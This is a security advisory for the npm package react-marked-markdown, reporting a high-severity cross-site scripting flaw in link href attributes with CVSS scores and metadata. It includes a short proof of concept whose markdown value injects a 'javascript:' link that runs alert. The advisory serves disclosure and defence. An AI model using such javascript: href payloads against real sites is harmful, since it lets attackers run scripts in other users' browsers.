GHSA-m7qm-r2r5-f77q – react-marked-markdown

Package

Manager: npm
Name: react-marked-markdown
Vulnerable Version: >=0 <=1.4.6

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N/E:U/RL:O/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

Cross-Site Scripting in react-marked-markdown All versions of `react-marked-markdown` are vulnerable to cross-site scripting (XSS) via `href` attributes. This is exploitable if user is provided to `react-marked-markdown` Proof of concept: ``` import React from 'react' import ReactDOM from 'react-dom' import { MarkdownPreview } from 'react-marked-markdown' ReactDOM.render( <MarkdownPreview markedOptions={{ sanitize: true }} value={'[XSS](javascript: alert`1`)'} />, document.getElementById('root') ) ``` ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time if you allow user input into href values.

Metadata

Created: 2020-09-01T20:43:48Z
Modified: 2021-09-24T20:35:29Z
Source: MANUAL
CWE IDs: ["CWE-79"]
Alternative ID: N/A
Finding: F008
Auto approve: 1